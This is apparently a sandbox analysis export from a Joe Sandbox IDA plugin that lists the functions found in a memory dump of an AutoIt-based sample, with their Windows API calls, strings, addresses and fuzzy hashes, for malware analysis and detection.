Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 4bbe62853a935bcd90eca97e16638b3dd880ee13aacfe01170048abaa6b4a2ab
Instruction ID: b2dfaebe1c41a9935ea282e5807acfa821e2e1acce3285aea5b3edd2890318f3
Opcode Fuzzy Hash: 4bbe62853a935bcd90eca97e16638b3dd880ee13aacfe01170048abaa6b4a2ab
Instruction Fuzzy Hash: C01104727009159FE7212F26DC94A2F7B99EF84B32B144129FD06D7241DF78DD02AAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00F4C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F1027A,?), ref: 00F4C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F4C6F9

Strings

kernel32.dll, xrefs: 00F4C6E2
GetSystemWow64DirectoryW, xrefs: 00F4C6F3

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 5c0ea12dc931080c1fdc71354746f1ab441c726bf626e817179fe3c8c1ecd5a6
Instruction ID: f6ac06778eba55c98d0abfe70d02959cff6d2cc7e475d4f4e7c940b1e2129ddd
Opcode Fuzzy Hash: 5c0ea12dc931080c1fdc71354746f1ab441c726bf626e817179fe3c8c1ecd5a6
Instruction Fuzzy Hash: D6E0C2389013038FD7205B26CC48A537AD4FF04324B60982AED95C2250DBB0C840AF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F10030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F10034
__swprintf.LIBCMT ref: 00F10065

Strings

%.3d, xrefs: 00F1003F
WIN_XPe, xrefs: 00F100A4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 340107d7caee8b9a1f3b1b772b558aa65834bb44dac80892780704f9fd5a9510
Instruction ID: 60ba9d0ab8d221fda871a766ade75583b5130e2befc78d31160976efc73399fb
Opcode Fuzzy Hash: 340107d7caee8b9a1f3b1b772b558aa65834bb44dac80892780704f9fd5a9510
Instruction Fuzzy Hash: 36D0EC63808109EAC7089BA0C854EFA737CAB08300F204052F546A2040EAB586D8BB22

Uniqueness

Uniqueness Score: -1.00%

Function 00F34148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F3416D
Process32FirstW.KERNEL32(00000000,?), ref: 00F3417B
Process32NextW.KERNEL32(00000000,?), ref: 00F3419B
CloseHandle.KERNEL32(00000000), ref: 00F34245

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 3001333c83544d2315557902a57449f9410bce4c7b134e0b7e1fe1eef8fc6ce5
Instruction ID: b742e2c6373d0067f9a9941f0541c890feb486619802188a4b67d9408b5a1e48
Opcode Fuzzy Hash: 3001333c83544d2315557902a57449f9410bce4c7b134e0b7e1fe1eef8fc6ce5
Instruction Fuzzy Hash: 6C31D4711083459FC300EF51D885AAFBBE8BF95360F10092DF595E21A1EBB0E989DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F429BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00F42AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F42AE4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 8cd7f38488d8361b68ec61c20ae3cfaa0b5053a3635619971f019241a1d2f047
Instruction ID: 729a51b47b2b085923f64d743fc1246b9318ddcce216ac4dcce32798657b4a60
Opcode Fuzzy Hash: 8cd7f38488d8361b68ec61c20ae3cfaa0b5053a3635619971f019241a1d2f047
Instruction Fuzzy Hash: 6941D772A00209BFEB60DE55CC85FBBBBFCEB40764F50407AFE05A6141DAB49E41A660

Uniqueness

Uniqueness Score: -1.00%

Function 00F29399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00EF0FE6: std::exception::exception.LIBCMT ref: 00EF101C
Part of subcall function 00EF0FE6: __CxxThrowException@8.LIBCMT ref: 00EF1031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F293E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F29410
GetLastError.KERNEL32 ref: 00F2941D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 534f3c88a320aac8183d6ed7286f7f33c3409b1e169eaafc9211395101b4119e
Instruction ID: d06eac264b7ef7a0b53a00010a83e3cb640f73dc604c24da1e229700c61e2048
Opcode Fuzzy Hash: 534f3c88a320aac8183d6ed7286f7f33c3409b1e169eaafc9211395101b4119e
Instruction Fuzzy Hash: 2B118FB2918209BFD728EF54EC85D2BB7FCEB44710B20856EE45993241EBB0AC41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F342D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F342FF
DeviceIoControl.KERNEL32 ref: 00F3433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F34345

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 18a175ff0bfcae97fdb11f37b9e6dcbc625649918aeab09fa377720e22995d4a
Instruction ID: c05ba26512ba3d4d6893bf7eb8eac7b50b6d48607118b1a5f9c246ad7c988e4d
Opcode Fuzzy Hash: 18a175ff0bfcae97fdb11f37b9e6dcbc625649918aeab09fa377720e22995d4a
Instruction Fuzzy Hash: 651182B2D00229BEE7109BE89C44FAFB7BCEB09720F100556F924E7190C2B4AD4097A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F34F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F34F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F34F5C
FreeSid.ADVAPI32(?), ref: 00F34F6C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 63f13e80acf41d32d33534cd7d8823989b3e0683f5deb45460bcc40b8946d49f
Instruction ID: d2c050fe2d2df05e70c61e694672ad648b95685b1bd8dfb1372c5a369f04a06c
Opcode Fuzzy Hash: 63f13e80acf41d32d33534cd7d8823989b3e0683f5deb45460bcc40b8946d49f
Instruction Fuzzy Hash: 6CF03775A1120CBFDB00DFE09D89AAEBBB8EB08211F1044A9E901E2180E6746A049B50

Uniqueness

Uniqueness Score: -1.00%

Function 00F31AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F31B01
keybd_event.USER32 ref: 00F31B14

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 560e4557e0ccaa408fad190a55c464250066c2b35fb4b549c0dcb4f0bbcd4315
Instruction ID: adca4e7b069001453a0e954ee0a4e4bd2b53f3ddd487171061e3cca0e4abb9e5
Opcode Fuzzy Hash: 560e4557e0ccaa408fad190a55c464250066c2b35fb4b549c0dcb4f0bbcd4315
Instruction Fuzzy Hash: BDF0497190020DABDB00CF94C805BFEBBB4FF04315F10804AF95596292D7799A15EF94

Uniqueness

Uniqueness Score: -1.00%

Function 00F3A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00F49B52,?,00F6098C,?), ref: 00F3A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00F49B52,?,00F6098C,?), ref: 00F3A6EC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 91541bb87a444130e3e886a0c1f3f9f4ea8c6603a623e82793390c5a6afeb09a
Instruction ID: b59ec9d0b52f37fedd3fa3c9732d1946993b2f8479661102af6fa41cc017a4b2
Opcode Fuzzy Hash: 91541bb87a444130e3e886a0c1f3f9f4ea8c6603a623e82793390c5a6afeb09a
Instruction Fuzzy Hash: ECF0A73550422DBBDB20AFA5CC49FEA77ACFF09361F008155F918D7291DA709944DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00F28DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F28F27), ref: 00F28DFE
CloseHandle.KERNEL32(?,?,00F28F27), ref: 00F28E10

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 0a486fec46a42eb96bed54b449ca0535d98511306e91785ffddc872eb8d3b707
Instruction ID: 257a0d35c9097a03685b36cef622d461bfce7b776f4f19a165cbf583cb1d2dab
Opcode Fuzzy Hash: 0a486fec46a42eb96bed54b449ca0535d98511306e91785ffddc872eb8d3b707
Instruction Fuzzy Hash: 51E04F32010614FFE7262B50EC09E7777EDEB003107208819F56990470CF626C90EB10

Uniqueness

Uniqueness Score: -1.00%

Function 00EFA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EF8F87,?,?,?,00000001), ref: 00EFA38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EFA393

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0090646dbfffb1b0d3bb0ef201c7c265747b5df481b17502edb803491b88347a
Instruction ID: a098172d128704aae22e8a5936883b4fea3adb67820c3eeff6ab357228efb602
Opcode Fuzzy Hash: 0090646dbfffb1b0d3bb0ef201c7c265747b5df481b17502edb803491b88347a
Instruction Fuzzy Hash: 7AB0923106420CABCA402B91EC0AB8A3F68EB44A63F104010F61D44262EFE25450AA91

Uniqueness

Uniqueness Score: -1.00%

Function 00F445D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00F445F0

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: e2429feb2560ec0da5866dec53b96cf023cb0718dec6f9aea0f821f2e66a07f7
Instruction ID: 1a3de192e66b6ec252bbfff95f0d9b7705e963b65917449603b46bbae82eab4c
Opcode Fuzzy Hash: e2429feb2560ec0da5866dec53b96cf023cb0718dec6f9aea0f821f2e66a07f7
Instruction Fuzzy Hash: 65E092322001055FD700AF59D400A46BBE8EF54760B048416FC05E7350DE70B8018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00F351E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32 ref: 00F35205

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: fd6b6d3cb01a5ce5abf89dff5b003356422d28b80ed3305b5e852e8106d46f90
Instruction ID: 4280fe893ebdaa5b740334f10e7828185a9080e65106afb86fe853be5af02f4e
Opcode Fuzzy Hash: fd6b6d3cb01a5ce5abf89dff5b003356422d28b80ed3305b5e852e8106d46f90
Instruction Fuzzy Hash: C1D092A6560E0A79ED5827249E1FF772608E381FF1F994749B142890C2EDD4EC85B432

Uniqueness

Uniqueness Score: -1.00%

Function 00F29369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F28FA7), ref: 00F29389

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 5d6c247c1268ae25dfc368f262240666f954586457e6428713627e7775b82347
Instruction ID: e78b4571eacd4122ee2f9c1d4f8e9091ff99339db57bac0110eca88b750a810a
Opcode Fuzzy Hash: 5d6c247c1268ae25dfc368f262240666f954586457e6428713627e7775b82347
Instruction Fuzzy Hash: DFD05E3226050EBBEF018EA4DD01EAF3B69EB04B01F408111FE25C50A0C775D835AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F10722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00F10734

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b4fbea74fc7eaa8e0877b146165ddae40a483509b2d459dc4973a3df48e3a95e
Instruction ID: 9307fc33777a553f67579d617b2687d626a451bf5b95047ac33af2a315d4a9a7
Opcode Fuzzy Hash: b4fbea74fc7eaa8e0877b146165ddae40a483509b2d459dc4973a3df48e3a95e
Instruction Fuzzy Hash: 0BC04CF280010DDBCB05DBA0D998EEF77BCBB08304F200455E115B2100DBB49B849A71

Uniqueness

Uniqueness Score: -1.00%

Function 00EFA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EFA35A

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9d37d979bc1b3649c677aadd1b6d0ac938a988dba0cc360f624561c272adbe48
Instruction ID: 8a7179279f1491f1b9fdab1ee1f52bcafe047adb2639f61f9437a2673d5bd485
Opcode Fuzzy Hash: 9d37d979bc1b3649c677aadd1b6d0ac938a988dba0cc360f624561c272adbe48
Instruction Fuzzy Hash: 7FA0243001010CF7CF001F41FC054457F5CD7001517004010F40C00133DF73541055C0

Uniqueness

Uniqueness Score: -1.00%

Function 00F47EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F47F45
DeleteObject.GDI32(00000000), ref: 00F47F57
DestroyWindow.USER32 ref: 00F47F65
GetDesktopWindow.USER32 ref: 00F47F7F
GetWindowRect.USER32 ref: 00F47F86
SetRect.USER32 ref: 00F480C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F480D7
CreateWindowExW.USER32 ref: 00F4811F
GetClientRect.USER32(00000000,?), ref: 00F4812B
CreateWindowExW.USER32 ref: 00F48165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F48187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F4819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481A5
GlobalLock.KERNEL32 ref: 00F481AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481BD
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481CD
GlobalFree.KERNEL32 ref: 00F481D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F481EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F63C7C,00000000), ref: 00F48200
GlobalFree.KERNEL32 ref: 00F48210
CopyImage.USER32 ref: 00F48236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F48255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F48277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F48464

Strings

DISPLAY, xrefs: 00F482C7
, xrefs: 00F483EA
static, xrefs: 00F4815F, 00F482B6
AutoIt v3, xrefs: 00F48117

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a288b8c74f40368d64a18058de83e15fcfb0e1cf34a2ef2f788ce853866e5377
